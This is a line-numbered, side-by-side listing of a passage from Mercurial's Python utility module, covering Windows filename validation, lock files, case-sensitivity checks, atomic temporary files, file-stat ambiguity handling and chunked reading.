2049 for c in _filenamebytestr(n):
2050 for c in _filenamebytestr(n):
2050 if c in _winreservedchars:
2051 if c in _winreservedchars:
2051 return (
2052 return (
2052 _(
2053 _(
2053 b"filename contains '%s', which is reserved "
2054 b"filename contains '%s', which is reserved "
2054 b"on Windows"
2055 b"on Windows"
2055 )
2056 )
2056 % c
2057 % c
2057 )
2058 )
2058 if ord(c) <= 31:
2059 if ord(c) <= 31:
2059 return _(
2060 return _(
2060 b"filename contains '%s', which is invalid on Windows"
2061 b"filename contains '%s', which is invalid on Windows"
2061 ) % stringutil.escapestr(c)
2062 ) % stringutil.escapestr(c)
2062 base = n.split(b'.')[0]
2063 base = n.split(b'.')[0]
2063 if base and base.lower() in _winreservednames:
2064 if base and base.lower() in _winreservednames:
2064 return (
2065 return (
2065 _(b"filename contains '%s', which is reserved on Windows")
2066 _(b"filename contains '%s', which is reserved on Windows")
2066 % base
2067 % base
2067 )
2068 )
2068 t = n[-1:]
2069 t = n[-1:]
2069 if t in b'. ' and n not in b'..':
2070 if t in b'. ' and n not in b'..':
2070 return (
2071 return (
2071 _(
2072 _(
2072 b"filename ends with '%s', which is not allowed "
2073 b"filename ends with '%s', which is not allowed "
2073 b"on Windows"
2074 b"on Windows"
2074 )
2075 )
2075 % t
2076 % t
2076 )
2077 )
2077
2078
2078
2079
2079 timer = getattr(time, "perf_counter", None)
2080 timer = getattr(time, "perf_counter", None)
2080
2081
2081 if pycompat.iswindows:
2082 if pycompat.iswindows:
2082 checkosfilename = checkwinfilename
2083 checkosfilename = checkwinfilename
2083 if not timer:
2084 if not timer:
2084 timer = time.clock
2085 timer = time.clock
2085 else:
2086 else:
2086 # mercurial.windows doesn't have platform.checkosfilename
2087 # mercurial.windows doesn't have platform.checkosfilename
2087 checkosfilename = platform.checkosfilename # pytype: disable=module-attr
2088 checkosfilename = platform.checkosfilename # pytype: disable=module-attr
2088 if not timer:
2089 if not timer:
2089 timer = time.time
2090 timer = time.time
2090
2091
2091
2092
2092 def makelock(info, pathname):
2093 def makelock(info, pathname):
2093 """Create a lock file atomically if possible
2094 """Create a lock file atomically if possible
2094
2095
2095 This may leave a stale lock file if symlink isn't supported and signal
2096 This may leave a stale lock file if symlink isn't supported and signal
2096 interrupt is enabled.
2097 interrupt is enabled.
2097 """
2098 """
2098 try:
2099 try:
2099 return os.symlink(info, pathname)
2100 return os.symlink(info, pathname)
2100 except OSError as why:
2101 except OSError as why:
2101 if why.errno == errno.EEXIST:
2102 if why.errno == errno.EEXIST:
2102 raise
2103 raise
2103 except AttributeError: # no symlink in os
2104 except AttributeError: # no symlink in os
2104 pass
2105 pass
2105
2106
2106 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
2107 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
2107 ld = os.open(pathname, flags)
2108 ld = os.open(pathname, flags)
2108 os.write(ld, info)
2109 os.write(ld, info)
2109 os.close(ld)
2110 os.close(ld)
2110
2111
2111
2112
2112 def readlock(pathname):
2113 def readlock(pathname):
2113 try:
2114 try:
2114 return readlink(pathname)
2115 return readlink(pathname)
2115 except OSError as why:
2116 except OSError as why:
2116 if why.errno not in (errno.EINVAL, errno.ENOSYS):
2117 if why.errno not in (errno.EINVAL, errno.ENOSYS):
2117 raise
2118 raise
2118 except AttributeError: # no symlink in os
2119 except AttributeError: # no symlink in os
2119 pass
2120 pass
2120 with posixfile(pathname, b'rb') as fp:
2121 with posixfile(pathname, b'rb') as fp:
2121 return fp.read()
2122 return fp.read()
2122
2123
2123
2124
2124 def fstat(fp):
2125 def fstat(fp):
2125 '''stat file object that may not have fileno method.'''
2126 '''stat file object that may not have fileno method.'''
2126 try:
2127 try:
2127 return os.fstat(fp.fileno())
2128 return os.fstat(fp.fileno())
2128 except AttributeError:
2129 except AttributeError:
2129 return os.stat(fp.name)
2130 return os.stat(fp.name)
2130
2131
2131
2132
2132 # File system features
2133 # File system features
2133
2134
2134
2135
2135 def fscasesensitive(path):
2136 def fscasesensitive(path):
2136 """
2137 """
2137 Return true if the given path is on a case-sensitive filesystem
2138 Return true if the given path is on a case-sensitive filesystem
2138
2139
2139 Requires a path (like /foo/.hg) ending with a foldable final
2140 Requires a path (like /foo/.hg) ending with a foldable final
2140 directory component.
2141 directory component.
2141 """
2142 """
2142 s1 = os.lstat(path)
2143 s1 = os.lstat(path)
2143 d, b = os.path.split(path)
2144 d, b = os.path.split(path)
2144 b2 = b.upper()
2145 b2 = b.upper()
2145 if b == b2:
2146 if b == b2:
2146 b2 = b.lower()
2147 b2 = b.lower()
2147 if b == b2:
2148 if b == b2:
2148 return True # no evidence against case sensitivity
2149 return True # no evidence against case sensitivity
2149 p2 = os.path.join(d, b2)
2150 p2 = os.path.join(d, b2)
2150 try:
2151 try:
2151 s2 = os.lstat(p2)
2152 s2 = os.lstat(p2)
2152 if s2 == s1:
2153 if s2 == s1:
2153 return False
2154 return False
2154 return True
2155 return True
2155 except OSError:
2156 except OSError:
2156 return True
2157 return True
2157
2158
2158
2159
2159 try:
2160 try:
2160 import re2 # pytype: disable=import-error
2161 import re2 # pytype: disable=import-error
2161
2162
2162 _re2 = None
2163 _re2 = None
2163 except ImportError:
2164 except ImportError:
2164 _re2 = False
2165 _re2 = False
2165
2166
2166
2167
2167 class _re(object):
2168 class _re(object):
2168 def _checkre2(self):
2169 def _checkre2(self):
2169 global _re2
2170 global _re2
2170 try:
2171 try:
2171 # check if match works, see issue3964
2172 # check if match works, see issue3964
2172 _re2 = bool(re2.match(r'\[([^\[]+)\]', b'[ui]'))
2173 _re2 = bool(re2.match(r'\[([^\[]+)\]', b'[ui]'))
2173 except ImportError:
2174 except ImportError:
2174 _re2 = False
2175 _re2 = False
2175
2176
2176 def compile(self, pat, flags=0):
2177 def compile(self, pat, flags=0):
2177 '''Compile a regular expression, using re2 if possible
2178 '''Compile a regular expression, using re2 if possible
2178
2179
2179 For best performance, use only re2-compatible regexp features. The
2180 For best performance, use only re2-compatible regexp features. The
2180 only flags from the re module that are re2-compatible are
2181 only flags from the re module that are re2-compatible are
2181 IGNORECASE and MULTILINE.'''
2182 IGNORECASE and MULTILINE.'''
2182 if _re2 is None:
2183 if _re2 is None:
2183 self._checkre2()
2184 self._checkre2()
2184 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
2185 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
2185 if flags & remod.IGNORECASE:
2186 if flags & remod.IGNORECASE:
2186 pat = b'(?i)' + pat
2187 pat = b'(?i)' + pat
2187 if flags & remod.MULTILINE:
2188 if flags & remod.MULTILINE:
2188 pat = b'(?m)' + pat
2189 pat = b'(?m)' + pat
2189 try:
2190 try:
2190 return re2.compile(pat)
2191 return re2.compile(pat)
2191 except re2.error:
2192 except re2.error:
2192 pass
2193 pass
2193 return remod.compile(pat, flags)
2194 return remod.compile(pat, flags)
2194
2195
2195 @propertycache
2196 @propertycache
2196 def escape(self):
2197 def escape(self):
2197 '''Return the version of escape corresponding to self.compile.
2198 '''Return the version of escape corresponding to self.compile.
2198
2199
2199 This is imperfect because whether re2 or re is used for a particular
2200 This is imperfect because whether re2 or re is used for a particular
2200 function depends on the flags, etc, but it's the best we can do.
2201 function depends on the flags, etc, but it's the best we can do.
2201 '''
2202 '''
2202 global _re2
2203 global _re2
2203 if _re2 is None:
2204 if _re2 is None:
2204 self._checkre2()
2205 self._checkre2()
2205 if _re2:
2206 if _re2:
2206 return re2.escape
2207 return re2.escape
2207 else:
2208 else:
2208 return remod.escape
2209 return remod.escape
2209
2210
2210
2211
2211 re = _re()
2212 re = _re()
2212
2213
2213 _fspathcache = {}
2214 _fspathcache = {}
2214
2215
2215
2216
2216 def fspath(name, root):
2217 def fspath(name, root):
2217 '''Get name in the case stored in the filesystem
2218 '''Get name in the case stored in the filesystem
2218
2219
2219 The name should be relative to root, and be normcase-ed for efficiency.
2220 The name should be relative to root, and be normcase-ed for efficiency.
2220
2221
2221 Note that this function is unnecessary, and should not be
2222 Note that this function is unnecessary, and should not be
2222 called, for case-sensitive filesystems (simply because it's expensive).
2223 called, for case-sensitive filesystems (simply because it's expensive).
2223
2224
2224 The root should be normcase-ed, too.
2225 The root should be normcase-ed, too.
2225 '''
2226 '''
2226
2227
2227 def _makefspathcacheentry(dir):
2228 def _makefspathcacheentry(dir):
2228 return {normcase(n): n for n in os.listdir(dir)}
2229 return {normcase(n): n for n in os.listdir(dir)}
2229
2230
2230 seps = pycompat.ossep
2231 seps = pycompat.ossep
2231 if pycompat.osaltsep:
2232 if pycompat.osaltsep:
2232 seps = seps + pycompat.osaltsep
2233 seps = seps + pycompat.osaltsep
2233 # Protect backslashes. This gets silly very quickly.
2234 # Protect backslashes. This gets silly very quickly.
2234 seps.replace(b'\\', b'\\\\')
2235 seps.replace(b'\\', b'\\\\')
2235 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
2236 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
2236 dir = os.path.normpath(root)
2237 dir = os.path.normpath(root)
2237 result = []
2238 result = []
2238 for part, sep in pattern.findall(name):
2239 for part, sep in pattern.findall(name):
2239 if sep:
2240 if sep:
2240 result.append(sep)
2241 result.append(sep)
2241 continue
2242 continue
2242
2243
2243 if dir not in _fspathcache:
2244 if dir not in _fspathcache:
2244 _fspathcache[dir] = _makefspathcacheentry(dir)
2245 _fspathcache[dir] = _makefspathcacheentry(dir)
2245 contents = _fspathcache[dir]
2246 contents = _fspathcache[dir]
2246
2247
2247 found = contents.get(part)
2248 found = contents.get(part)
2248 if not found:
2249 if not found:
2249 # retry "once per directory" per "dirstate.walk" which
2250 # retry "once per directory" per "dirstate.walk" which
2250 # may take place for each patches of "hg qpush", for example
2251 # may take place for each patches of "hg qpush", for example
2251 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2252 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2252 found = contents.get(part)
2253 found = contents.get(part)
2253
2254
2254 result.append(found or part)
2255 result.append(found or part)
2255 dir = os.path.join(dir, part)
2256 dir = os.path.join(dir, part)
2256
2257
2257 return b''.join(result)
2258 return b''.join(result)
2258
2259
2259
2260
2260 def checknlink(testfile):
2261 def checknlink(testfile):
2261 '''check whether hardlink count reporting works properly'''
2262 '''check whether hardlink count reporting works properly'''
2262
2263
2263 # testfile may be open, so we need a separate file for checking to
2264 # testfile may be open, so we need a separate file for checking to
2264 # work around issue2543 (or testfile may get lost on Samba shares)
2265 # work around issue2543 (or testfile may get lost on Samba shares)
2265 f1, f2, fp = None, None, None
2266 f1, f2, fp = None, None, None
2266 try:
2267 try:
2267 fd, f1 = pycompat.mkstemp(
2268 fd, f1 = pycompat.mkstemp(
2268 prefix=b'.%s-' % os.path.basename(testfile),
2269 prefix=b'.%s-' % os.path.basename(testfile),
2269 suffix=b'1~',
2270 suffix=b'1~',
2270 dir=os.path.dirname(testfile),
2271 dir=os.path.dirname(testfile),
2271 )
2272 )
2272 os.close(fd)
2273 os.close(fd)
2273 f2 = b'%s2~' % f1[:-2]
2274 f2 = b'%s2~' % f1[:-2]
2274
2275
2275 oslink(f1, f2)
2276 oslink(f1, f2)
2276 # nlinks() may behave differently for files on Windows shares if
2277 # nlinks() may behave differently for files on Windows shares if
2277 # the file is open.
2278 # the file is open.
2278 fp = posixfile(f2)
2279 fp = posixfile(f2)
2279 return nlinks(f2) > 1
2280 return nlinks(f2) > 1
2280 except OSError:
2281 except OSError:
2281 return False
2282 return False
2282 finally:
2283 finally:
2283 if fp is not None:
2284 if fp is not None:
2284 fp.close()
2285 fp.close()
2285 for f in (f1, f2):
2286 for f in (f1, f2):
2286 try:
2287 try:
2287 if f is not None:
2288 if f is not None:
2288 os.unlink(f)
2289 os.unlink(f)
2289 except OSError:
2290 except OSError:
2290 pass
2291 pass
2291
2292
2292
2293
2293 def endswithsep(path):
2294 def endswithsep(path):
2294 '''Check path ends with os.sep or os.altsep.'''
2295 '''Check path ends with os.sep or os.altsep.'''
2295 return (
2296 return (
2296 path.endswith(pycompat.ossep)
2297 path.endswith(pycompat.ossep)
2297 or pycompat.osaltsep
2298 or pycompat.osaltsep
2298 and path.endswith(pycompat.osaltsep)
2299 and path.endswith(pycompat.osaltsep)
2299 )
2300 )
2300
2301
2301
2302
2302 def splitpath(path):
2303 def splitpath(path):
2303 '''Split path by os.sep.
2304 '''Split path by os.sep.
2304 Note that this function does not use os.altsep because this is
2305 Note that this function does not use os.altsep because this is
2305 an alternative of simple "xxx.split(os.sep)".
2306 an alternative of simple "xxx.split(os.sep)".
2306 It is recommended to use os.path.normpath() before using this
2307 It is recommended to use os.path.normpath() before using this
2307 function if need.'''
2308 function if need.'''
2308 return path.split(pycompat.ossep)
2309 return path.split(pycompat.ossep)
2309
2310
2310
2311
2311 def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
2312 def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
2312 """Create a temporary file with the same contents from name
2313 """Create a temporary file with the same contents from name
2313
2314
2314 The permission bits are copied from the original file.
2315 The permission bits are copied from the original file.
2315
2316
2316 If the temporary file is going to be truncated immediately, you
2317 If the temporary file is going to be truncated immediately, you
2317 can use emptyok=True as an optimization.
2318 can use emptyok=True as an optimization.
2318
2319
2319 Returns the name of the temporary file.
2320 Returns the name of the temporary file.
2320 """
2321 """
2321 d, fn = os.path.split(name)
2322 d, fn = os.path.split(name)
2322 fd, temp = pycompat.mkstemp(prefix=b'.%s-' % fn, suffix=b'~', dir=d)
2323 fd, temp = pycompat.mkstemp(prefix=b'.%s-' % fn, suffix=b'~', dir=d)
2323 os.close(fd)
2324 os.close(fd)
2324 # Temporary files are created with mode 0600, which is usually not
2325 # Temporary files are created with mode 0600, which is usually not
2325 # what we want. If the original file already exists, just copy
2326 # what we want. If the original file already exists, just copy
2326 # its mode. Otherwise, manually obey umask.
2327 # its mode. Otherwise, manually obey umask.
2327 copymode(name, temp, createmode, enforcewritable)
2328 copymode(name, temp, createmode, enforcewritable)
2328
2329
2329 if emptyok:
2330 if emptyok:
2330 return temp
2331 return temp
2331 try:
2332 try:
2332 try:
2333 try:
2333 ifp = posixfile(name, b"rb")
2334 ifp = posixfile(name, b"rb")
2334 except IOError as inst:
2335 except IOError as inst:
2335 if inst.errno == errno.ENOENT:
2336 if inst.errno == errno.ENOENT:
2336 return temp
2337 return temp
2337 if not getattr(inst, 'filename', None):
2338 if not getattr(inst, 'filename', None):
2338 inst.filename = name
2339 inst.filename = name
2339 raise
2340 raise
2340 ofp = posixfile(temp, b"wb")
2341 ofp = posixfile(temp, b"wb")
2341 for chunk in filechunkiter(ifp):
2342 for chunk in filechunkiter(ifp):
2342 ofp.write(chunk)
2343 ofp.write(chunk)
2343 ifp.close()
2344 ifp.close()
2344 ofp.close()
2345 ofp.close()
2345 except: # re-raises
2346 except: # re-raises
2346 try:
2347 try:
2347 os.unlink(temp)
2348 os.unlink(temp)
2348 except OSError:
2349 except OSError:
2349 pass
2350 pass
2350 raise
2351 raise
2351 return temp
2352 return temp
2352
2353
2353
2354
2354 class filestat(object):
2355 class filestat(object):
2355 """help to exactly detect change of a file
2356 """help to exactly detect change of a file
2356
2357
2357 'stat' attribute is result of 'os.stat()' if specified 'path'
2358 'stat' attribute is result of 'os.stat()' if specified 'path'
2358 exists. Otherwise, it is None. This can avoid preparative
2359 exists. Otherwise, it is None. This can avoid preparative
2359 'exists()' examination on client side of this class.
2360 'exists()' examination on client side of this class.
2360 """
2361 """
2361
2362
2362 def __init__(self, stat):
2363 def __init__(self, stat):
2363 self.stat = stat
2364 self.stat = stat
2364
2365
2365 @classmethod
2366 @classmethod
2366 def frompath(cls, path):
2367 def frompath(cls, path):
2367 try:
2368 try:
2368 stat = os.stat(path)
2369 stat = os.stat(path)
2369 except OSError as err:
2370 except OSError as err:
2370 if err.errno != errno.ENOENT:
2371 if err.errno != errno.ENOENT:
2371 raise
2372 raise
2372 stat = None
2373 stat = None
2373 return cls(stat)
2374 return cls(stat)
2374
2375
2375 @classmethod
2376 @classmethod
2376 def fromfp(cls, fp):
2377 def fromfp(cls, fp):
2377 stat = os.fstat(fp.fileno())
2378 stat = os.fstat(fp.fileno())
2378 return cls(stat)
2379 return cls(stat)
2379
2380
2380 __hash__ = object.__hash__
2381 __hash__ = object.__hash__
2381
2382
2382 def __eq__(self, old):
2383 def __eq__(self, old):
2383 try:
2384 try:
2384 # if ambiguity between stat of new and old file is
2385 # if ambiguity between stat of new and old file is
2385 # avoided, comparison of size, ctime and mtime is enough
2386 # avoided, comparison of size, ctime and mtime is enough
2386 # to exactly detect change of a file regardless of platform
2387 # to exactly detect change of a file regardless of platform
2387 return (
2388 return (
2388 self.stat.st_size == old.stat.st_size
2389 self.stat.st_size == old.stat.st_size
2389 and self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2390 and self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2390 and self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME]
2391 and self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME]
2391 )
2392 )
2392 except AttributeError:
2393 except AttributeError:
2393 pass
2394 pass
2394 try:
2395 try:
2395 return self.stat is None and old.stat is None
2396 return self.stat is None and old.stat is None
2396 except AttributeError:
2397 except AttributeError:
2397 return False
2398 return False
2398
2399
2399 def isambig(self, old):
2400 def isambig(self, old):
2400 """Examine whether new (= self) stat is ambiguous against old one
2401 """Examine whether new (= self) stat is ambiguous against old one
2401
2402
2402 "S[N]" below means stat of a file at N-th change:
2403 "S[N]" below means stat of a file at N-th change:
2403
2404
2404 - S[n-1].ctime < S[n].ctime: can detect change of a file
2405 - S[n-1].ctime < S[n].ctime: can detect change of a file
2405 - S[n-1].ctime == S[n].ctime
2406 - S[n-1].ctime == S[n].ctime
2406 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2407 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2407 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2408 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2408 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2409 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2409 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2410 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2410
2411
2411 Case (*2) above means that a file was changed twice or more at
2412 Case (*2) above means that a file was changed twice or more at
2412 same time in sec (= S[n-1].ctime), and comparison of timestamp
2413 same time in sec (= S[n-1].ctime), and comparison of timestamp
2413 is ambiguous.
2414 is ambiguous.
2414
2415
2415 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2416 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2416 timestamp is ambiguous".
2417 timestamp is ambiguous".
2417
2418
2418 But advancing mtime only in case (*2) doesn't work as
2419 But advancing mtime only in case (*2) doesn't work as
2419 expected, because naturally advanced S[n].mtime in case (*1)
2420 expected, because naturally advanced S[n].mtime in case (*1)
2420 might be equal to manually advanced S[n-1 or earlier].mtime.
2421 might be equal to manually advanced S[n-1 or earlier].mtime.
2421
2422
2422 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2423 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2423 treated as ambiguous regardless of mtime, to avoid overlooking
2424 treated as ambiguous regardless of mtime, to avoid overlooking
2424 by confliction between such mtime.
2425 by confliction between such mtime.
2425
2426
2426 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2427 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2427 S[n].mtime", even if size of a file isn't changed.
2428 S[n].mtime", even if size of a file isn't changed.
2428 """
2429 """
2429 try:
2430 try:
2430 return self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2431 return self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2431 except AttributeError:
2432 except AttributeError:
2432 return False
2433 return False
2433
2434
2434 def avoidambig(self, path, old):
2435 def avoidambig(self, path, old):
2435 """Change file stat of specified path to avoid ambiguity
2436 """Change file stat of specified path to avoid ambiguity
2436
2437
2437 'old' should be previous filestat of 'path'.
2438 'old' should be previous filestat of 'path'.
2438
2439
2439 This skips avoiding ambiguity, if a process doesn't have
2440 This skips avoiding ambiguity, if a process doesn't have
2440 appropriate privileges for 'path'. This returns False in this
2441 appropriate privileges for 'path'. This returns False in this
2441 case.
2442 case.
2442
2443
2443 Otherwise, this returns True, as "ambiguity is avoided".
2444 Otherwise, this returns True, as "ambiguity is avoided".
2444 """
2445 """
2445 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2446 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2446 try:
2447 try:
2447 os.utime(path, (advanced, advanced))
2448 os.utime(path, (advanced, advanced))
2448 except OSError as inst:
2449 except OSError as inst:
2449 if inst.errno == errno.EPERM:
2450 if inst.errno == errno.EPERM:
2450 # utime() on the file created by another user causes EPERM,
2451 # utime() on the file created by another user causes EPERM,
2451 # if a process doesn't have appropriate privileges
2452 # if a process doesn't have appropriate privileges
2452 return False
2453 return False
2453 raise
2454 raise
2454 return True
2455 return True
2455
2456
2456 def __ne__(self, other):
2457 def __ne__(self, other):
2457 return not self == other
2458 return not self == other
2458
2459
2459
2460
2460 class atomictempfile(object):
2461 class atomictempfile(object):
2461 '''writable file object that atomically updates a file
2462 '''writable file object that atomically updates a file
2462
2463
2463 All writes will go to a temporary copy of the original file. Call
2464 All writes will go to a temporary copy of the original file. Call
2464 close() when you are done writing, and atomictempfile will rename
2465 close() when you are done writing, and atomictempfile will rename
2465 the temporary copy to the original name, making the changes
2466 the temporary copy to the original name, making the changes
2466 visible. If the object is destroyed without being closed, all your
2467 visible. If the object is destroyed without being closed, all your
2467 writes are discarded.
2468 writes are discarded.
2468
2469
2469 checkambig argument of constructor is used with filestat, and is
2470 checkambig argument of constructor is used with filestat, and is
2470 useful only if target file is guarded by any lock (e.g. repo.lock
2471 useful only if target file is guarded by any lock (e.g. repo.lock
2471 or repo.wlock).
2472 or repo.wlock).
2472 '''
2473 '''
2473
2474
2474 def __init__(self, name, mode=b'w+b', createmode=None, checkambig=False):
2475 def __init__(self, name, mode=b'w+b', createmode=None, checkambig=False):
2475 self.__name = name # permanent name
2476 self.__name = name # permanent name
2476 self._tempname = mktempcopy(
2477 self._tempname = mktempcopy(
2477 name,
2478 name,
2478 emptyok=(b'w' in mode),
2479 emptyok=(b'w' in mode),
2479 createmode=createmode,
2480 createmode=createmode,
2480 enforcewritable=(b'w' in mode),
2481 enforcewritable=(b'w' in mode),
2481 )
2482 )
2482
2483
2483 self._fp = posixfile(self._tempname, mode)
2484 self._fp = posixfile(self._tempname, mode)
2484 self._checkambig = checkambig
2485 self._checkambig = checkambig
2485
2486
2486 # delegated methods
2487 # delegated methods
2487 self.read = self._fp.read
2488 self.read = self._fp.read
2488 self.write = self._fp.write
2489 self.write = self._fp.write
2489 self.seek = self._fp.seek
2490 self.seek = self._fp.seek
2490 self.tell = self._fp.tell
2491 self.tell = self._fp.tell
2491 self.fileno = self._fp.fileno
2492 self.fileno = self._fp.fileno
2492
2493
2493 def close(self):
2494 def close(self):
2494 if not self._fp.closed:
2495 if not self._fp.closed:
2495 self._fp.close()
2496 self._fp.close()
2496 filename = localpath(self.__name)
2497 filename = localpath(self.__name)
2497 oldstat = self._checkambig and filestat.frompath(filename)
2498 oldstat = self._checkambig and filestat.frompath(filename)
2498 if oldstat and oldstat.stat:
2499 if oldstat and oldstat.stat:
2499 rename(self._tempname, filename)
2500 rename(self._tempname, filename)
2500 newstat = filestat.frompath(filename)
2501 newstat = filestat.frompath(filename)
2501 if newstat.isambig(oldstat):
2502 if newstat.isambig(oldstat):
2502 # stat of changed file is ambiguous to original one
2503 # stat of changed file is ambiguous to original one
2503 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2504 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2504 os.utime(filename, (advanced, advanced))
2505 os.utime(filename, (advanced, advanced))
2505 else:
2506 else:
2506 rename(self._tempname, filename)
2507 rename(self._tempname, filename)
2507
2508
2508 def discard(self):
2509 def discard(self):
2509 if not self._fp.closed:
2510 if not self._fp.closed:
2510 try:
2511 try:
2511 os.unlink(self._tempname)
2512 os.unlink(self._tempname)
2512 except OSError:
2513 except OSError:
2513 pass
2514 pass
2514 self._fp.close()
2515 self._fp.close()
2515
2516
2516 def __del__(self):
2517 def __del__(self):
2517 if safehasattr(self, '_fp'): # constructor actually did something
2518 if safehasattr(self, '_fp'): # constructor actually did something
2518 self.discard()
2519 self.discard()
2519
2520
2520 def __enter__(self):
2521 def __enter__(self):
2521 return self
2522 return self
2522
2523
2523 def __exit__(self, exctype, excvalue, traceback):
2524 def __exit__(self, exctype, excvalue, traceback):
2524 if exctype is not None:
2525 if exctype is not None:
2525 self.discard()
2526 self.discard()
2526 else:
2527 else:
2527 self.close()
2528 self.close()
2528
2529
2529
2530
2530 def unlinkpath(f, ignoremissing=False, rmdir=True):
2531 def unlinkpath(f, ignoremissing=False, rmdir=True):
2531 """unlink and remove the directory if it is empty"""
2532 """unlink and remove the directory if it is empty"""
2532 if ignoremissing:
2533 if ignoremissing:
2533 tryunlink(f)
2534 tryunlink(f)
2534 else:
2535 else:
2535 unlink(f)
2536 unlink(f)
2536 if rmdir:
2537 if rmdir:
2537 # try removing directories that might now be empty
2538 # try removing directories that might now be empty
2538 try:
2539 try:
2539 removedirs(os.path.dirname(f))
2540 removedirs(os.path.dirname(f))
2540 except OSError:
2541 except OSError:
2541 pass
2542 pass
2542
2543
2543
2544
2544 def tryunlink(f):
2545 def tryunlink(f):
2545 """Attempt to remove a file, ignoring ENOENT errors."""
2546 """Attempt to remove a file, ignoring ENOENT errors."""
2546 try:
2547 try:
2547 unlink(f)
2548 unlink(f)
2548 except OSError as e:
2549 except OSError as e:
2549 if e.errno != errno.ENOENT:
2550 if e.errno != errno.ENOENT:
2550 raise
2551 raise
2551
2552
2552
2553
2553 def makedirs(name, mode=None, notindexed=False):
2554 def makedirs(name, mode=None, notindexed=False):
2554 """recursive directory creation with parent mode inheritance
2555 """recursive directory creation with parent mode inheritance
2555
2556
2556 Newly created directories are marked as "not to be indexed by
2557 Newly created directories are marked as "not to be indexed by
2557 the content indexing service", if ``notindexed`` is specified
2558 the content indexing service", if ``notindexed`` is specified
2558 for "write" mode access.
2559 for "write" mode access.
2559 """
2560 """
2560 try:
2561 try:
2561 makedir(name, notindexed)
2562 makedir(name, notindexed)
2562 except OSError as err:
2563 except OSError as err:
2563 if err.errno == errno.EEXIST:
2564 if err.errno == errno.EEXIST:
2564 return
2565 return
2565 if err.errno != errno.ENOENT or not name:
2566 if err.errno != errno.ENOENT or not name:
2566 raise
2567 raise
2567 parent = os.path.dirname(os.path.abspath(name))
2568 parent = os.path.dirname(os.path.abspath(name))
2568 if parent == name:
2569 if parent == name:
2569 raise
2570 raise
2570 makedirs(parent, mode, notindexed)
2571 makedirs(parent, mode, notindexed)
2571 try:
2572 try:
2572 makedir(name, notindexed)
2573 makedir(name, notindexed)
2573 except OSError as err:
2574 except OSError as err:
2574 # Catch EEXIST to handle races
2575 # Catch EEXIST to handle races
2575 if err.errno == errno.EEXIST:
2576 if err.errno == errno.EEXIST:
2576 return
2577 return
2577 raise
2578 raise
2578 if mode is not None:
2579 if mode is not None:
2579 os.chmod(name, mode)
2580 os.chmod(name, mode)
2580
2581
2581
2582
2582 def readfile(path):
2583 def readfile(path):
2583 with open(path, b'rb') as fp:
2584 with open(path, b'rb') as fp:
2584 return fp.read()
2585 return fp.read()
2585
2586
2586
2587
2587 def writefile(path, text):
2588 def writefile(path, text):
2588 with open(path, b'wb') as fp:
2589 with open(path, b'wb') as fp:
2589 fp.write(text)
2590 fp.write(text)
2590
2591
2591
2592
2592 def appendfile(path, text):
2593 def appendfile(path, text):
2593 with open(path, b'ab') as fp:
2594 with open(path, b'ab') as fp:
2594 fp.write(text)
2595 fp.write(text)
2595
2596
2596
2597
2597 class chunkbuffer(object):
2598 class chunkbuffer(object):
2598 """Allow arbitrary sized chunks of data to be efficiently read from an
2599 """Allow arbitrary sized chunks of data to be efficiently read from an
2599 iterator over chunks of arbitrary size."""
2600 iterator over chunks of arbitrary size."""
2600
2601
2601 def __init__(self, in_iter):
2602 def __init__(self, in_iter):
2602 """in_iter is the iterator that's iterating over the input chunks."""
2603 """in_iter is the iterator that's iterating over the input chunks."""
2603
2604
2604 def splitbig(chunks):
2605 def splitbig(chunks):
2605 for chunk in chunks:
2606 for chunk in chunks:
2606 if len(chunk) > 2 ** 20:
2607 if len(chunk) > 2 ** 20:
2607 pos = 0
2608 pos = 0
2608 while pos < len(chunk):
2609 while pos < len(chunk):
2609 end = pos + 2 ** 18
2610 end = pos + 2 ** 18
2610 yield chunk[pos:end]
2611 yield chunk[pos:end]
2611 pos = end
2612 pos = end
2612 else:
2613 else:
2613 yield chunk
2614 yield chunk
2614
2615
2615 self.iter = splitbig(in_iter)
2616 self.iter = splitbig(in_iter)
2616 self._queue = collections.deque()
2617 self._queue = collections.deque()
2617 self._chunkoffset = 0
2618 self._chunkoffset = 0
2618
2619
2619 def read(self, l=None):
2620 def read(self, l=None):
2620 """Read L bytes of data from the iterator of chunks of data.
2621 """Read L bytes of data from the iterator of chunks of data.
2621 Returns less than L bytes if the iterator runs dry.
2622 Returns less than L bytes if the iterator runs dry.
2622
2623
2623 If size parameter is omitted, read everything"""
2624 If size parameter is omitted, read everything"""
